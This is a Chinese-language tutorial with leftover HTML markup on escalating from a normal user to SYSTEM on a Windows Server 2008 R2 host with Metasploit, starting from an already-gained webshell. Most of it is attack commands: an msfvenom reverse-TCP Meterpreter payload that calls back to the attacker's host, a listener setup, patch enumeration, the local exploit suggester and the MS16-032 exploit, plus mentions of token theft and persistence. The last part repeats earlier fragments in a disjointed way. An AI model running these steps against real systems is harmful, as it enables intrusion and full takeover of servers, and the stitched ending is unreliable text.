Metasploit Framework (MSF) 提权实战教程<\/h1>

环境准备<\/h2>

攻击机配置<\/h3>

操作系统：Kali Linux<\/li>

IP地址：192.168.8.139<\/li> <\/ul>

目标机配置<\/h3>

操作系统：Windows Server 2008 R2 (英文版)<\/li>
IP地址：192.168.8.84<\/li>

当前用户：普通用户abc<\/li> <\/ul>

前期准备<\/h2>
已通过文件上传漏洞获取Webshell，并使用蚁剑连接，需要从普通用户提权至SYSTEM权限。<\/p>

详细提权步骤<\/h2>

1. 生成反弹Shell可执行文件<\/h3>

在Kali终端执行以下命令生成反弹Shell：<\/p>

msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=<\/span>192.168.8.139 LPORT=<\/span>8087<\/span> -f exe > \/home\/kali\/Desktop\/abc5.exe
<\/span><\/span><\/code><\/pre>参数说明：<\/p>

-p windows\/meterpreter\/reverse_tcp<\/code>：指定payload类型为Windows反弹TCP连接<\/li>
LHOST<\/code>：指定监听主机的IP地址（Kali的IP）<\/li>
LPORT<\/code>：指定监听端口<\/li>
-f exe<\/code>：输出格式为可执行文件<\/li>
<\/ul>
2. 上传并执行payload<\/h3>
将生成的abc5.exe<\/code>通过蚁剑上传至目标服务器，并执行该文件。<\/p>
3. 设置监听器<\/h3>
在Kali中启动MSF控制台：<\/p>
msfconsole
<\/span><\/span><\/code><\/pre>配置并启动监听模块：<\/p>
use exploit\/multi\/handler
<\/span><\/span>set payload windows\/meterpreter\/reverse_tcp
<\/span><\/span>set LHOST 192.168.8.139
<\/span><\/span>set LPORT 8087<\/span>
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>4. 获取初始Meterpreter会话<\/h3>
当目标执行payload后，Kali将获得Meterpreter会话。验证当前用户权限：<\/p>
getuid
<\/span><\/span><\/code><\/pre>5. 后台运行会话<\/h3>
将当前会话放入后台：<\/p>
background
<\/span><\/span><\/code><\/pre>查看活动会话：<\/p>
sessions
<\/span><\/span><\/code><\/pre>6. 枚举系统补丁<\/h3>
使用补丁枚举模块识别已安装的补丁：<\/p>
use post\/windows\/gather\/enum_patches
<\/span><\/span>show options
<\/span><\/span>set SESSION 1<\/span>  # 设置当前会话ID<\/span>
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>7. 漏洞利用建议<\/h3>
使用本地漏洞建议模块识别可能的提权漏洞：<\/p>
use post\/multi\/recon\/local_exploit_suggester
<\/span><\/span>show options
<\/span><\/span>set SESSION 1<\/span>
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>结果分析：<\/p>

绿色标记的漏洞可能有用（描述为"The target appears to be vulnerable"）<\/li>
红色标记的漏洞通常无效<\/li>
重点关注描述为"The service is running, but could not be validated"的漏洞<\/li>
<\/ul>
8. 执行提权漏洞利用<\/h3>
选择建议的漏洞进行利用（以MS16-032为例）：<\/p>
use exploit\/windows\/local\/ms16_032_secondary_logon_handle_privesc
<\/span><\/span>show options
<\/span><\/span>set SESSION 1<\/span>
<\/span><\/span>run
<\/span><\/span><\/code><\/pre>验证提权结果：<\/p>
getuid
<\/span><\/span><\/code><\/pre>成功提权后应显示"NT AUTHORITY\SYSTEM"。<\/p>
关键点总结<\/h2>

Payload生成<\/strong>：必须正确设置LHOST和LPORT参数<\/li>
监听配置<\/strong>：监听器的payload类型必须与生成的payload一致<\/li>
会话管理<\/strong>：使用background命令保持会话，sessions命令查看活动会话<\/li>
补丁枚举<\/strong>：了解目标系统补丁状态有助于选择合适的提权漏洞<\/li>
漏洞选择<\/strong>：优先尝试服务正在运行的漏洞利用模块<\/li>
权限验证<\/strong>：每次操作后使用getuid验证当前权限级别<\/li>
<\/ol>
常见问题解决<\/h2>


监听无响应<\/strong>：<\/p>

检查防火墙设置<\/li>
确认payload已正确上传并执行<\/li>
验证LHOST和LPORT设置一致<\/li>
<\/ul>
<\/li>

提权失败<\/strong>：<\/p>

尝试其他建议的漏洞利用模块<\/li>
检查目标系统是否已安装相关补丁<\/li>
考虑使用其他提权技术（如令牌窃取、服务权限滥用等）<\/li>
<\/ul>
<\/li>

会话丢失<\/strong>：<\/p>

确保网络连接稳定<\/li>
考虑使用持久化技术维持访问<\/li>
<\/ul>
<\/li>
<\/ol>
通过以上步骤，可以系统性地从普通用户权限提升至SYSTEM权限，为后续渗透测试活动奠定基础。<\/p>

Metasploit Framework (MSF) 提权实战教程<\/h1>

环境准备<\/h2>

前期准备<\/h2> 已通过文件上传漏洞获取Webshell，并使用蚁剑连接，需要从普通用户提权至SYSTEM权限。<\/p>

详细提权步骤<\/h2>

2. 上传并执行payload<\/h3> 将生成的abc5.exe<\/code>通过蚁剑上传至目标服务器，并执行该文件。<\/p>

前期准备<\/h2>
已通过文件上传漏洞获取Webshell，并使用蚁剑连接，需要从普通用户提权至SYSTEM权限。<\/p>

2. 上传并执行payload<\/h3>
将生成的`abc5.exe<\/code>通过蚁剑上传至目标服务器，并执行该文件。<\/p>`